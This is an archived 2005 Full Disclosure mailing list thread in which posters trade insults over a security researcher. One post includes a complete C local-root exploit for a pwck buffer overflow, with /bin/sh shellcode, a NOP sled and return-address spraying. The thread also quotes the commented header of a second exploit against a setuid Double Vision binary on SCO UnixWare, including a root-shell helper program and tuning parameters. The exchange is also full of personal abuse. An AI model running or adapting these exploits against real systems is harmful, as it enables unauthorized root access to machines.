Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
From: Day Jay <d4yj4y () yahoo com>
Date: Mon, 9 May 2005 10:38:08 -0700 (PDT)

I advise everyone to check out o'great Steve's site
and I have never seen such a celebration of mediocrity
and unutilized "knowledge" anywhere else in my life.
If I was even convinced of 1% of what skills he claims
to have, then there would be much more under that
fatman's belt.

oh, what I won't tell you is what makes me so great.
Wish I could, but I would never give you that time of
day. Sorry.

Just because you met fat Steve and he was nice,
doesn't make him special at all. You should get out
more and meet more people-that's the only advice I
could give you.

Let's keep the ass-kissing to a min. pls kthxbye


--- tuytumadre () att net wrote:

Day jay, you may find it fun to criticize those
recognized by Microsoft, but let me remind you that
Steve has done more to help computer security then
you will ever dream of accomplishing. He has
forgotten more about computers then you will ever
learn. I have met Steve, and he is a very nice man.

Steve is a very successful person, contrary to your
opinion of the alternative. I am surprised that
people still hold you in any form of regard, after
you acting like a complete asshole during your dumb
shellcode-masked backdoor incident. However, I do
not know enough about you to categorize you as a
jerk. What do you do for a living? What makes you so
special that you can criticize a successful,
intellegent man for your personal satisfaction, or
are you just a hypocrite? Tell me, oh "1337" one.

Paul
-------------- Original message from Day Jay
<d4yj4y () yahoo com>: -------------- 


We all saw how short the code was I had for that
pwck 
buffer overflow exploit. He also hardcodes the
stack 
pointer, hahah. 

----------MINE----------------- 
#include 
char shellcode[] = 


"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"



"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"



"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"

"\x68"; 
unsigned long sp(void) 
{ __asm__("movl %esp, %eax");} 
int main(int argc, char *argv[]) 
{ 
int i, offset; 
long esp, ret, *addr_ptr; 
char *buffer, *ptr; 
offset = 1700; //the offset I first found worked 
esp = sp(); 
ret = esp - offset; 
buffer = malloc(2200); 
ptr = buffer; 
addr_ptr = (long *) ptr; 
for(i=0; i < 2200; i+=4) 
{ *(addr_ptr++) = ret; } 
for(i=0; i < 1000; i++) 
{ buffer[i] = '\x90'; } 
ptr = buffer + 200; 
for(i=0; i < strlen(shellcode); i++) 
{ *(ptr++) = shellcode[i]; } 
buffer[2200-1] = 0; 
printf("d4yj4y fscked j00r mom!\n"); sleep(2); 
execl("/usr/sbin/pwck", "pwck", buffer, 0); 
free(buffer); 
return 0; 
} 
------------------HIS-------------- 

I have a feeling Steve was just mad mine was so
short 
compared to his, lol 

THIS IS HIS LOCAL ROOT EXPLOIT: 
/* 
* dvexploit.c 
* 
* written by : Stephen J. Friedl 
* Software Consultant 
* 2000-06-24 
* steve unixwiz net 
* 
* This program exploits the "Double Vision" system
on 
SCO 
* Unixware 7.1.0 via a buffer overflow on the 
"dvtermtype" 
* program. Double Vision is like a "pcAnywhere for

UNIX", 
* but quite a few programs in this distribution
are 
setuid 
* root. The problem is that these programs were
not 
written 
* with security in mind, and it's not clear that
they 
even 
* need to be setuid root. 
* 
* This particular program exploits "dvtermtype" by

passing a 
* very long second parameter that overflows some 
internal 
* buffer. This buffer is filled with a predicted 
address 
* of the shellcode, and the shellcode itself is 
stored in 
* a very long environment variable. This approach 
makes 
* the shellcode much easier to find. 
* 
* This shellcode was based directly on the great
work 
of 
* Brock Tellier (btellier usa net), who seems to 
spend a lot 
* of time within with various SCO UNIX release. 
Thanks! 
* 
* This shellcode runs /tmp/ui, which should be
this 
simple 
* program: 
* 
* $ cd /tmp 
* $ cat ui.c 
* int main() { setreuid(0,0); system("/bin/sh"); 
return 0; } 
* $ cc ui.c -o ui 
* 
* Brock's original work compiled this
automatically, 
but I 
* prefer to do it by hand. A better approach is to
do 
the 
* setreuid() in the shellcode and call /bin/sh 
directly. 
* Maybe another day. 
* 
* BUILD/TEST ENVIRONMENT 
* ---------------------- 
* 
* $ cc -v 
* UX:cc: INFO: Optimizing C Compilation System
(CCS) 
3.2 03/03/99 (CA-unk_voyager5) 
* 
* $ uname -a 
* UnixWare foo 5 7.1.0 i386 x86at SCO UNIX_SVR5 
* 
* from /usr/lib/dv/README 
* 
* DoubleVision for Character Terminals Release 3.0

* Last Update: December 7, 1999 
* 
* TUNING 
* ------ 
* 
* The default parameters to this program work on
the 
versions mentioned 
* above, but for variants some tuning might be 
required. There are three 
* parameters that guide this program's operation: 
* 
* -a retaddr set the "return" address to the given

hex value, 
* which is the address where we expect to find the

* exploit code in the environment. The environment

* is at a relatively fixed location just below 
* 0x80000000, so getting "close" is usually 
sufficient. 
* Note that this address cannot have any zero
bytes 
* in it! We believe that the target code has
enough 
* padding NOP values to make it an easy target. 
* 
* -r retlen length of the overflowed "return
address" 
buffer, 
* which is filled in with the address provided 
above. 
* Default = 2k, max = 5k. 
* 
* -l n slightly shift the alignment of the return 
address 
* buffer by 1, 2 or 3 in case the buffer that's 
being 
* overflowed. 
*/ 


=== message truncated ===>
_______________________________________________
Full-Disclosure - We believe in it.
Charter:

http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -
http://secunia.com/


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]